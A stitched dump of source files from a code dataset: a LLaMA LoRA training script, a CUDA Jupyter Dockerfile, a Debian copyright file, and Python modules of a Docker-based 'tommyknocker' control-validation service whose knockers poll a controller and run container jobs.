model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}, "
        + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
    )
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
    # force the logger to load before tokenize_function, since tokenize_function will be
    # pickled and a lazily loaded logger would trigger a _LazyModule error in Hasher
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
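    # e.g. a tokenizer reporting model_max_length=4096 still trains on 1024-token chunks
    # unless --block_size is passed explicitly (numbers hypothetical, for illustration).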
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = LlamaForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
# model_vocab_size = model.get_output_embeddings().weight.size(0)
# if not (
# (model_vocab_size==32000 and len(tokenizer)==49953) or \
# (model_vocab_size==32000 and len(tokenizer)==32000) or \
# (model_vocab_size==49953 and len(tokenizer)==49953) or \
# (model_vocab_size==49954 and len(tokenizer)==49954)
# ):
# raise ValueError(
# f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
# "Valid configurations (base model / tokenizer):\n"
# "- Continue pre-training original LLaMA: 32000 / 32000 \n"
# "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
# "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
# "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
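    # Patch state_dict so checkpoints serialize only the trainable PEFT (LoRA)
    # weights instead of the full base model.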
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,340 | Python | .py | 574 | 40.569686 | 200 | 0.647099 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,537 | jupyter.dockerfile | adithya-s-k_Indic-llm/docker_environment/jupyter.dockerfile | ARG CUDA_VERSION="11.8.0"
ARG CUDNN_VERSION="8"
ARG UBUNTU_VERSION="22.04"
ARG MAX_JOBS=4
FROM nvidia/cuda:$CUDA_VERSION-cudnn$CUDNN_VERSION-devel-ubuntu$UBUNTU_VERSION as base-builder
ENV PATH="/root/miniconda3/bin:${PATH}"
ARG PYTHON_VERSION="3.9"
ARG PYTORCH_VERSION="2.0.1"
ARG CUDA="118"
ARG TORCH_CUDA_ARCH_LIST="7.0 7.5 8.0 8.6 9.0+PTX"
ENV PYTHON_VERSION=$PYTHON_VERSION
ENV TORCH_CUDA_ARCH_LIST=$TORCH_CUDA_ARCH_LIST
RUN apt-get update \
&& apt-get install -y wget git build-essential ninja-build git-lfs libaio-dev && rm -rf /var/lib/apt/lists/* \
&& wget \
https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh \
&& mkdir /root/.conda \
&& bash Miniconda3-latest-Linux-x86_64.sh -b \
&& rm -f Miniconda3-latest-Linux-x86_64.sh \
&& conda create -n "py${PYTHON_VERSION}" python="${PYTHON_VERSION}"
ENV PATH="/root/miniconda3/envs/py${PYTHON_VERSION}/bin:${PATH}"
WORKDIR /workspace
RUN python3 -m pip install --upgrade pip && pip3 install packaging && \
python3 -m pip install --no-cache-dir -U torch==${PYTORCH_VERSION}+cu${CUDA} deepspeed-kernels --extra-index-url https://download.pytorch.org/whl/cu$CUDA
RUN git lfs install --skip-repo && \
pip3 install awscli && \
# The base image ships with `pydantic==1.8.2` which is not working
pip3 install -U --no-cache-dir pydantic==1.10.10
# torch is already pinned to the CUDA build above; reinstalling it here could
# pull in a mismatched wheel, so only add the extras
RUN pip install \
    numpy \
    jupyterlab
# start jupyter lab
CMD ["jupyter", "lab", "--ip=0.0.0.0", "--port=8888", "--allow-root", "--no-browser"]
EXPOSE 8888 | 1,541 | Python | .pyt | 35 | 41.142857 | 157 | 0.704545 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,538 | copyright | amateur80lvl_lxcex/packages/uidmapshift/debian/copyright | Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: uidmapshift
Upstream-Contact: Serge Hallyn <[email protected]>
Source: http://bazaar.launchpad.net/~serge-hallyn/+junk/nsexec/view/head:/uidmapshift.c

Files: *
Copyright: 2024 Anonymous
License: GPL-2.0

Files: uidmapshift.c
Copyright: 2012-2016 Canonical, Inc
License: GPL-2.0

License: GPL-2.0
 On Debian systems the full text of the GPL-2 can be found in
 /usr/share/common-licenses/GPL-2
| 503 | Python | .py | 13 | 37.153846 | 87 | 0.778234 | amateur80lvl/lxcex | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,539 | knock.py | loredous_tommyknocker/src/python/knocker/knock.py | import logging
from typing import Any
from statemachine import State, StateMachine
import docker
from shared.models.objects import Knock, Runner, Test
class ActiveKnock(StateMachine):
"""A state machine for tracking the status of knocks and updating their status with the controller"""
pending = State(initial=True)
pulling = State()
running = State()
complete = State(final=True)
errored = State(final=True)
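    # Happy path: pending -> pulling -> running -> complete; `fail` routes any
    # non-final state to `errored`.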
cycle = pending.to(pulling) | pulling.to(running, cond="pull_complete") | running.to(complete, cond="run_complete")
fail = pending.to(errored) | pulling.to(errored) | running.to(errored)
pull_complete = False
container = None
def __init__(self, knock: Knock, runner: Runner, test: Test, state_field: str = "state", start_value: Any = None, rtc: bool = True, allow_event_without_transition: bool = False):
super().__init__(None, state_field, start_value, rtc, allow_event_without_transition)
self.logger = logging.getLogger("ActiveKnock")
self._docker_client = docker.from_env()
self.knock = knock
self.test = test
self.runner = runner
self.state_message = ""
self.output = ""
self.exit_code = None
def before_cycle(self, event: str, source: State, target: State, message: str = ""):
self.logger.debug(f"Transitioning {self.knock.id} from {source.name} to {target.name} with message {message}")
def on_enter_pulling(self, event: str, source: State, target: State, message: str = ""):
try:
self._docker_client.images.pull(self.runner.image_name, self.runner.image_tag)
self.pull_complete = True
except docker.errors.APIError as err:
self.logger.error(f"Failed to pull image for knock {self.knock.id}: {err}")
self.state_message = f"Failed to pull image for knock {self.knock.id}: {err}"
self.fail()
def on_enter_running(self, event: str, source: State, target: State, message: str = ""):
try:
            self.container = self._docker_client.containers.run(f"{self.runner.image_name}:{self.runner.image_tag}", self.knock.command, detach=True)
except docker.errors.APIError as err:
self.logger.error(f"Failed to run image for knock {self.knock.id}: {err}")
self.state_message = f"Failed to run image for knock {self.knock.id}: {err}"
self.fail()
def run_complete(self) -> bool:
self.container.reload()
return self.container.status == "exited"
def on_enter_complete(self, event: str, source: State, target: State, message: str = ""):
self.logger.info(f"Knock {self.knock.id} complete")
self.state_message = f"Knock {self.knock.id} complete"
result = self.container.wait()
self.exit_code = result.pop("StatusCode")
        self.output = self.container.logs(stdout=True, stderr=False).decode("utf-8", errors="replace")
self.logger.debug(f"Knock {self.knock.id} exited with status code {self.exit_code} and output:\n {self.output}")
self.container.remove() | 3,050 | Python | .py | 54 | 48.555556 | 182 | 0.666555 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,540 | service.py | loredous_tommyknocker/src/python/knocker/service.py | import asyncio
from dataclasses import dataclass, asdict
from logging import getLogger
import sched
from typing import Dict, List
from uuid import UUID
import requests
from shared.models.objects import Result, Test, Knock, TestConfiguration, TestComponentStatus, Runner
from shared.models.apiobjects import NewTestComponentStatus, UpdatedTestComponentStatus
from shared.models.enums import ComponentStatus, TestStatus, ComponentType
from knocker.knock import ActiveKnock
@dataclass
class KnockerConfig:
controller: str
port: int
interval: int
identity: str
def __str__(self) -> str:
return str(vars(self))
class v1ControllerAPIInteractor:
def __init__(self, controller, port, identity) -> None:
self.url = f"http://{controller}:{port}/api/v1/"
self.logger = getLogger("v1ControllerAPIInteractor")
self.logger.debug(f"Initialized v1 controller API interactor with URL: {self.url}")
self.identity = identity
def send_post_request(self, endpoint: str, data: Dict = {}) -> requests.Response:
self.logger.debug(f"Sending POST request to {endpoint} with data: {data}")
response = requests.post(f"{self.url}{endpoint}", json=data)
self.logger.debug(f"Received response from {endpoint}: [{response.status_code}] {response.text}")
return response
def send_get_request(self, endpoint: str) -> requests.Response:
self.logger.debug(f"Sending GET request to {endpoint}")
response = requests.get(f"{self.url}{endpoint}")
self.logger.debug(f"Received response from {endpoint}: [{response.status_code}] {response.text}")
return response
def send_put_request(self, endpoint: str, data: Dict) -> requests.Response:
self.logger.debug(f"Sending PUT request to {endpoint} with data: {data}")
response = requests.put(f"{self.url}{endpoint}", json=data)
self.logger.debug(f"Received response from {endpoint}: [{response.status_code}] {response.text}")
return response
def checkin(self) -> List[Test]:
self.logger.info(f"Checking in with controller")
response = self.send_post_request(f"knockers/{self.identity}/checkin", {})
if response.status_code != 200:
self.logger.error(f"Failed to check in with controller: [{response.status_code}] {response.text}")
return []
else:
self.logger.debug(f"Successfully checked in with controller")
return [Test(**test) for test in response.json()]
def get_test_by_id(self, test_id: UUID) -> Test:
self.logger.info(f"Getting test by ID {test_id}")
response = self.send_get_request(f"tests/{test_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get test by ID {test_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got test by ID {test_id}")
return Test(**response.json())
## TODO: Optimize as server-side method
def get_test_config_by_test_id(self, test_id: UUID) -> TestConfiguration:
self.logger.info(f"Getting test configuration for test ID {test_id}")
test = self.get_test_by_id(test_id)
if not test:
self.logger.error(f"Failed to get test ID {test_id}")
return None
else:
test_config = self.get_test_config_by_id(test.configuration_id)
self.logger.debug(f"Successfully got test configuration for test ID {test_id}")
return test_config
def get_test_config_by_id(self, config_id: UUID) -> TestConfiguration:
self.logger.info(f"Getting test configuration for test ID {config_id}")
response = self.send_get_request(f"test-configurations/{config_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get test configuration for test ID {config_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got test configuration for test ID {config_id}")
return TestConfiguration(**response.json())
def get_knock_by_id(self, knock_id: UUID) -> Knock:
self.logger.info(f"Getting knock by ID {knock_id}")
response = self.send_get_request(f"knocks/{knock_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get knock by ID {knock_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got knock by ID {knock_id}")
return Knock(**response.json())
def get_runner_by_id(self, runner_id: UUID) -> Runner:
self.logger.info(f"Getting runner by ID {runner_id}")
response = self.send_get_request(f"runners/{runner_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get runner by ID {runner_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got runner by ID {runner_id}")
return Runner(**response.json())
def get_test_component_status_by_id(self, status_id: UUID) -> TestComponentStatus:
self.logger.info(f"Getting test component status by ID {status_id}")
response = self.send_get_request(f"test-component-statuses/{status_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get test component status by ID {status_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got test component status by ID {status_id}")
return TestComponentStatus(**response.json())
def create_new_test_component_status(self, component_id: UUID, component_type: str, status: TestStatus) -> TestComponentStatus:
self.logger.info(f"Creating new test component status for component ID {component_id}")
response = self.send_post_request(f"test-component-statuses", asdict(NewTestComponentStatus(component_id, component_type, status)))
if response.status_code != 200:
self.logger.error(f"Failed to create new test component status for component ID {component_id}: [{response.status_code}] {response.text}")
else:
self.logger.debug(f"Successfully created new test component status for component ID {component_id}")
return TestComponentStatus(**response.json())
def add_test_component_status_to_test(self, test_id: UUID, status_id: UUID):
self.logger.info(f"Adding test component status with ID {status_id} to test with ID {test_id}")
response = self.send_put_request(f"tests/{test_id}/add_component_status/{status_id}", data = {})
if response.status_code != 200:
self.logger.error(f"Failed to add test component status with ID {status_id} to test with ID {test_id}: [{response.status_code}] {response.text}")
else:
self.logger.debug(f"Successfully added test component status with ID {status_id} to test with ID {test_id}")
    def update_test_component_status(self, status_id: UUID, status: UpdatedTestComponentStatus):
self.logger.info(f"Updating test component status with ID {status_id}")
response = self.send_put_request(f"test-component-statuses/{status_id}", {"status": status.status.value})
if response.status_code != 200:
self.logger.error(f"Failed to update test component status with ID {status_id}: [{response.status_code}] {response.text}")
else:
self.logger.debug(f"Successfully updated test component status with ID {status_id}")
def create_or_update_test_component_status(self, test_id: UUID, component_id: UUID, status: TestStatus):
self.logger.info(f"Creating or updating test component status for test ID {test_id} and component ID {component_id}")
test = self.get_test_by_id(test_id)
if not test:
self.logger.error(f"Failed Creating or updating test component status for test ID {test_id} and component ID {component_id}")
return
else:
for component_status_id in test.component_status_ids:
component_status = self.get_test_component_status_by_id(component_status_id)
if component_status.component_id == component_id:
self.update_test_component_status(component_status.id, UpdatedTestComponentStatus(status))
return
test_component_status = self.create_new_test_component_status(component_id, ComponentType.KNOCK, status)
self.add_test_component_status_to_test(test_id, test_component_status.id)
def get_result_by_id(self, result_id: UUID) -> Result:
self.logger.info(f"Getting result by ID {result_id}")
response = self.send_get_request(f"results/{result_id}")
if response.status_code != 200:
self.logger.error(f"Failed to get result by ID {result_id}: [{response.status_code}] {response.text}")
return None
else:
self.logger.debug(f"Successfully got result by ID {result_id}")
return Result(**response.json())
def get_knock_expected_results(self, knock_id: UUID) -> List[Result]:
self.logger.info(f"Getting expected results for knock with ID {knock_id}")
knock = self.get_knock_by_id(knock_id)
expected_results = []
if knock is None:
self.logger.error(f"Failed to get knock by ID {knock_id}")
return []
for result_id in knock.result_ids:
response = self.get_result_by_id(result_id)
if response is None:
self.logger.error(f"Failed to get result by ID {result_id}")
return None
expected_results.append(response)
return expected_results
class KnockerService:
def __init__(self, config: KnockerConfig):
self.config = config
self.scheduler = sched.scheduler()
self.knocks: Dict[UUID, ActiveKnock] = {}
self.logger = getLogger("KnockerService")
self.logger.info("Initialized knocker service")
self.logger.debug(f"Config: {self.config}")
self._api_interactor = v1ControllerAPIInteractor(self.config.controller, self.config.port, self.config.identity)
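    # run() drives two recurring jobs on one sched loop: periodic controller
    # check-ins and cycling of the active knock state machines.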
def run(self):
self.logger.info("Running knocker service")
self.checkin()
self.scheduler.enter(self.config.interval, 1, self.progress_active_knocks)
self.scheduler.run()
def checkin(self):
self.logger.info("Checking in with controller")
try:
tests = self._api_interactor.checkin()
self.scheduler.enter(0, 1, self.update_active_state, (tests,))
except Exception as e:
self.logger.error(f"Failed to check in with controller: {e}")
finally:
self.logger.debug(f"Checkin successful. Scheduling next checkin in {self.config.interval} seconds")
self.scheduler.enter(self.config.interval, 1, self.checkin)
def update_active_state(self, tests: List[Test]):
for test in tests:
if test.status >= TestStatus.CHECKING:
self.logger.debug(f"Test with ID {test.id} done knocking. Cleaning up knocks")
cleanup_targets = []
for knock_test_id in self.knocks:
if knock_test_id.startswith(str(test.id)):
cleanup_targets.append(knock_test_id)
for target in cleanup_targets:
self.knocks.pop(target)
continue
configuration = self._api_interactor.get_test_config_by_id(test.configuration_id)
if configuration is None:
self.logger.error(f"Failed to get test configuration for test ID {test.id}")
continue
for knock_id in configuration.knock_ids:
knock_test_id = f'{test.id}.{knock_id}'
if knock_test_id not in self.knocks:
knock = self._api_interactor.get_knock_by_id(knock_id)
if knock is None:
self.logger.error(f"Failed to get knock by ID {knock_id}")
continue
runner = self._api_interactor.get_runner_by_id(knock.runner_id)
self.knocks[knock_test_id] = ActiveKnock(knock=knock, runner=runner, test=test)
self.logger.debug(f"Added test-knock with ID {knock_test_id} to active state")
def progress_active_knocks(self):
try:
for knock_id, knock in self.knocks.items():
if not knock.current_state.final:
self.logger.debug(f"Cycling knock with id {knock_id}")
knock.cycle()
self._api_interactor.create_or_update_test_component_status(knock.test.id, knock.knock.id, ComponentStatus.PENDING if knock.current_state in [ActiveKnock.pending, ActiveKnock.pulling] else ComponentStatus.RUNNING)
else:
self.logger.debug(f"Knock with ID {knock_id} is already complete")
self.scheduler.enter(0, 1, self.check_knock_results, (knock,))
finally:
self.scheduler.enter(self.config.interval, 1, self.progress_active_knocks)
def check_knock_results(self, knock:ActiveKnock):
self.logger.debug(f"Checking result for knock with ID {knock.knock.id}")
expected_results = self._api_interactor.get_knock_expected_results(knock.knock.id)
actual_results = [result.check_result(exit_code=knock.exit_code, output=knock.output) for result in expected_results]
if all(actual_results):
self._api_interactor.create_or_update_test_component_status(knock.test.id, knock.knock.id, ComponentStatus.SUCCESS)
else:
self._api_interactor.create_or_update_test_component_status(knock.test.id, knock.knock.id, ComponentStatus.FAILURE)
| 14,149 | Python | .py | 233 | 49.600858 | 233 | 0.65547 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,541 | main.py | loredous_tommyknocker/src/python/knocker/main.py | from argparse import ArgumentParser, Namespace
from logging import DEBUG, INFO, basicConfig, getLogger
import sys
from knocker.service import KnockerConfig, KnockerService
def parse_arguments(args) -> Namespace:
parser = ArgumentParser(description="Knocker service for the Tommyknocker control validation service")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
parser.add_argument("-c", "--controller", type=str, help="Hostname or IP address for the Tommyknocker controller API")
parser.add_argument("-p", "--port", type=int, help="Port for the Tommyknocker controller API", default=443)
parser.add_argument("-i", "--interval", type=int, help="Interval in seconds between checkins with the Tommyknocker controller API", default=10)
parser.add_argument("-I", "--identity", type=str, help="Identity token for this knocker from the Tommyknocker controller API")
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_arguments(sys.argv[1:])
basicConfig(level=DEBUG if args.verbose else INFO)
logger = getLogger("Main")
logger.info("Starting knocker service")
logger.debug(f"Config: {args}")
KnockerService(KnockerConfig(controller=args.controller, port=args.port, interval=args.interval, identity=args.identity)).run()
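    # Example invocation (host and identity token are placeholders):
    #   python -m knocker.main -c controller.example.local -p 8000 -i 10 -I <knocker-uuid>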
| 1,336 | Python | .py | 19 | 66.210526 | 147 | 0.750382 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,542 | state.py | loredous_tommyknocker/src/python/controller/state.py | from abc import ABC, abstractmethod
from datetime import datetime
from typing import Dict, List
from uuid import UUID
import asyncio
import pickle
from controller.settings import app_settings
from shared.models.objects import Knock, Knocker, Runner, Monitor, ResponseExpectation, Test, TestComponentStatus, TestConfiguration, TestSuite, Result, Response
import shared.models.apiobjects as APIObjects
from controller.errors import DuplicateException, NotFoundException
from shared.models.enums import ResultType, TestStatus
class ControllerState(ABC):
#region Knocker Management
@abstractmethod
def list_knockers(self) -> List[Knocker]:
raise NotImplementedError
@abstractmethod
def get_knocker_by_id(self, id: UUID) -> Knocker:
raise NotImplementedError
@abstractmethod
def create_knocker(self, knocker: Knocker) -> Knocker:
raise NotImplementedError
@abstractmethod
def update_knocker(self, knocker: Knocker) -> Knocker:
raise NotImplementedError
@abstractmethod
def delete_knocker(self, id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def knocker_checkin(self, id: UUID) -> None:
raise NotImplementedError
#endregion Knocker Management
#region Knock Management
@abstractmethod
def list_knocks(self) -> List[Knock]:
raise NotImplementedError
@abstractmethod
def get_knock_by_id(self, id: UUID) -> Knock:
raise NotImplementedError
@abstractmethod
def create_knock(self, knock: Knock) -> Knock:
raise NotImplementedError
@abstractmethod
def update_knock(self, knock: Knock) -> Knock:
raise NotImplementedError
@abstractmethod
def delete_knock(self, id: UUID) -> None:
raise NotImplementedError
#endregion Knock Management
#region Runner Management
@abstractmethod
def list_runners(self) -> List[Runner]:
raise NotImplementedError
@abstractmethod
def get_runner_by_id(self, id: UUID) -> Runner:
raise NotImplementedError
@abstractmethod
def create_runner(self, runner: Runner) -> Runner:
raise NotImplementedError
@abstractmethod
def update_runner(self, runner: Runner) -> Runner:
raise NotImplementedError
@abstractmethod
def delete_runner(self, id: UUID) -> None:
raise NotImplementedError
#endregion Runner Management
#region Result Management
@abstractmethod
def list_results(self) -> List[Result]:
raise NotImplementedError
@abstractmethod
def get_result_by_id(self, id: UUID) -> Result:
raise NotImplementedError
@abstractmethod
def create_result(self, result: Result) -> Result:
raise NotImplementedError
@abstractmethod
def update_result(self, result: Result) -> Result:
raise NotImplementedError
@abstractmethod
def delete_result(self, id: UUID) -> None:
raise NotImplementedError
#endregion Result Management
#region Monitor Management
@abstractmethod
def list_monitors(self) -> List[Monitor]:
raise NotImplementedError
@abstractmethod
